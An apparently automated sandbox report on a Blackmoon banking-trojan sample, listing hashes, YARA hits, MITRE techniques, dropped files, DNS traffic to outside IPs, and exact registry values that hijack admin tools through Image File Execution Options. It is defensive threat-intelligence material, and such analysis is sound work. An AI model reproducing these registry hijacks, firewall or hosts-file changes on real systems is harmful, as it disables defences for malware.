blackmoon | 399a8159f7487ef5c28e8fb8ad598f78fc5b7874efef013cbee71bb38c5ed301

Analysis

max time kernel
149s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
22/04/2025, 01:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe
Size

10.5MB
MD5

609a3b33cddb2d39996ea3cb1409629b
SHA1

c4449b40b1727a4795216aace77decd57834c8d4
SHA256

399a8159f7487ef5c28e8fb8ad598f78fc5b7874efef013cbee71bb38c5ed301
SHA512

91eb246c42de00a3be826fe4893e89dbd82db84bd373a1c8cf4c52371655891fcb566963f181d06fe731f8aad3633026d496686dbd6fe751aa5a67569e2ba58d
SSDEEP

196608:K2c1uwl1CPwDv3uFhi43v13uFnCPws8S/VW08Sr8lQeY3YgOFmknGzwHIPHd9DPb:KnEwl1CPwDv3uFY43v13uFnCPwa/VW0j

Score

10^/10

blackmoon mimikatz banker defense_evasion discovery execution persistence privilege_escalation trojan upx

Malware Config

Signatures

Blackmoon family
blackmoon
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 6 IoCs

resource	yara_rule
behavioral2/memory/1592-0-0x0000000000400000-0x0000000000D0F000-memory.dmp	family_blackmoon
behavioral2/memory/1592-8-0x0000000000400000-0x0000000000D0F000-memory.dmp	family_blackmoon
behavioral2/files/0x001a00000002b326-21.dat	family_blackmoon
behavioral2/memory/5364-23-0x0000000000400000-0x0000000000D0F000-memory.dmp	family_blackmoon
behavioral2/memory/3644-41-0x0000000000400000-0x0000000000469000-memory.dmp	family_blackmoon
behavioral2/memory/3644-46-0x0000000000400000-0x0000000000469000-memory.dmp	family_blackmoon

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

mimikatz is an open source tool to dump credentials on Windows 4 IoCs

resource	yara_rule
behavioral2/memory/1592-0-0x0000000000400000-0x0000000000D0F000-memory.dmp	mimikatz
behavioral2/memory/1592-8-0x0000000000400000-0x0000000000D0F000-memory.dmp	mimikatz
behavioral2/files/0x001a00000002b326-21.dat	mimikatz
behavioral2/memory/5364-23-0x0000000000400000-0x0000000000D0F000-memory.dmp	mimikatz

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cksygut.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe	cksygut.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	cksygut.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	cksygut.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5508	netsh.exe
1512	netsh.exe

Executes dropped EXE 13 IoCs

pid	Process
5444	hentai.exe
5668	xchlyg.exe
5364	cksygut.exe
4584	hentai.exe
756	cksygut.exe
2872	hentai.exe
3644	yjixppqtbckkefy26792.exe
1180	cksygut.exe
748	hentai.exe
5108	cksygut.exe
1488	hentai.exe
1192	cksygut.exe
1868	hentai.exe

Unexpected DNS network traffic destination 63 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	flow	ioc	pid	Process
Destination IP	72	51.254.25.115	1948	nslookup.exe
Destination IP	15	163.172.168.171	6100	nslookup.exe
Destination IP	31	188.226.146.136	5472	nslookup.exe
Destination IP	50	13.239.157.177	2360	nslookup.exe
Destination IP	63	198.100.148.224	3140	nslookup.exe
Destination IP	67	159.203.38.175	1724	nslookup.exe
Destination IP	70	66.70.228.164	5484	nslookup.exe
Destination IP	74	185.84.81.194	3948	nslookup.exe
Destination IP	14	163.172.168.171	6100	nslookup.exe
Destination IP	19	94.103.153.176	3560	nslookup.exe
Destination IP	62	142.4.205.47	3568	nslookup.exe
Destination IP	46	13.239.157.177	2360	nslookup.exe
Destination IP	53	207.148.83.241	5688	nslookup.exe
Destination IP	65	198.100.148.224	3140	nslookup.exe
Destination IP	42	144.76.103.143	5056	nslookup.exe
Destination IP	49	13.239.157.177	2360	nslookup.exe
Destination IP	52	207.148.83.241	5688	nslookup.exe
Destination IP	59	142.4.204.111	3340	nslookup.exe
Destination IP	12	161.97.219.84	868	nslookup.exe
Destination IP	18	94.103.153.176	3560	nslookup.exe
Destination IP	57	142.4.204.111	3340	nslookup.exe
Destination IP	60	142.4.205.47	3568	nslookup.exe
Destination IP	66	159.203.38.175	1724	nslookup.exe
Destination IP	34	51.75.173.177	4348	nslookup.exe
Destination IP	39	79.124.7.81	4484	nslookup.exe
Destination IP	9	161.97.219.84	868	nslookup.exe
Destination IP	21	207.192.71.13	244	nslookup.exe
Destination IP	69	66.70.228.164	5484	nslookup.exe
Destination IP	25	178.63.116.152	240	nslookup.exe
Destination IP	40	79.124.7.81	4484	nslookup.exe
Destination IP	35	51.75.173.177	4348	nslookup.exe
Destination IP	56	165.227.40.43	5020	nslookup.exe
Destination IP	58	142.4.204.111	3340	nslookup.exe
Destination IP	28	51.77.227.84	3776	nslookup.exe
Destination IP	44	5.132.191.104	5368	nslookup.exe
Destination IP	73	51.254.25.115	1948	nslookup.exe
Destination IP	29	51.77.227.84	3776	nslookup.exe
Destination IP	36	51.75.173.177	4348	nslookup.exe
Destination IP	51	207.148.83.241	5688	nslookup.exe
Destination IP	55	165.227.40.43	5020	nslookup.exe
Destination IP	68	159.203.38.175	1724	nslookup.exe
Destination IP	7	104.128.239.75	3088	nslookup.exe
Destination IP	11	161.97.219.84	868	nslookup.exe
Destination IP	16	163.172.168.171	6100	nslookup.exe
Destination IP	17	94.103.153.176	3560	nslookup.exe
Destination IP	20	207.192.71.13	244	nslookup.exe
Destination IP	27	51.77.227.84	3776	nslookup.exe
Destination IP	45	5.132.191.104	5368	nslookup.exe
Destination IP	64	198.100.148.224	3140	nslookup.exe
Destination IP	6	208.87.98.37	4032	nslookup.exe
Destination IP	41	144.76.103.143	5056	nslookup.exe
Destination IP	54	165.227.40.43	5020	nslookup.exe
Destination IP	5	208.87.98.37	4032	nslookup.exe
Destination IP	8	104.128.239.75	3088	nslookup.exe
Destination IP	22	207.192.71.13	244	nslookup.exe
Destination IP	23	178.63.116.152	240	nslookup.exe
Destination IP	30	188.226.146.136	5472	nslookup.exe
Destination IP	32	188.226.146.136	5472	nslookup.exe
Destination IP	43	144.76.103.143	5056	nslookup.exe
Destination IP	61	142.4.205.47	3568	nslookup.exe
Destination IP	26	178.63.116.152	240	nslookup.exe
Destination IP	38	79.124.7.81	4484	nslookup.exe
Destination IP	71	66.70.228.164	5484	nslookup.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

remove IFEO.

defense_evasion

Clear Persistence

T1070.009

description	ioc	Process
Delete value	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger	cksygut.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\xchlyg.exe	hentai.exe
File created	C:\Windows\SysWOW64\xchlyg.exe	hentai.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001900000002b32c-40.dat	upx
behavioral2/memory/3644-41-0x0000000000400000-0x0000000000469000-memory.dmp	upx
behavioral2/memory/756-38-0x0000000010000000-0x000000001000B000-memory.dmp	upx
behavioral2/memory/3644-46-0x0000000000400000-0x0000000000469000-memory.dmp	upx

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\wdabblgz\cksygut.exe	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe
File opened for modification	C:\Windows\wdabblgz\cksygut.exe	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe
File created	C:\Windows\wdabblgz\yjixppqtbckkefy26792.exe	cksygut.exe
File created	C:\Windows\Fonts\cksygut.exe	cksygut.exe
File opened for modification	C:\Windows\Fonts\cksygut.exe	cksygut.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4448	sc.exe
3944	sc.exe
2836	sc.exe
3736	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xchlyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cksygut.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-22_609a3b33cddb2d39996ea3cb1409629b_amadey_cloudeye_elex_hacktools_mimikatz_rhadamanthys_smoke-loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cksygut.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3960	cmd.exe
2228	PING.EXE

NSIS installer 1 IoCs

installer

resource	yara_rule
behavioral2/files/0x001a00000002b326-21.dat	nsis_installer_2

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cksygut.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	cksygut.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	cksygut.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	cksygut.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	cksygut.exe

Modifies registry class 14 IoCs

description	ioc	Process
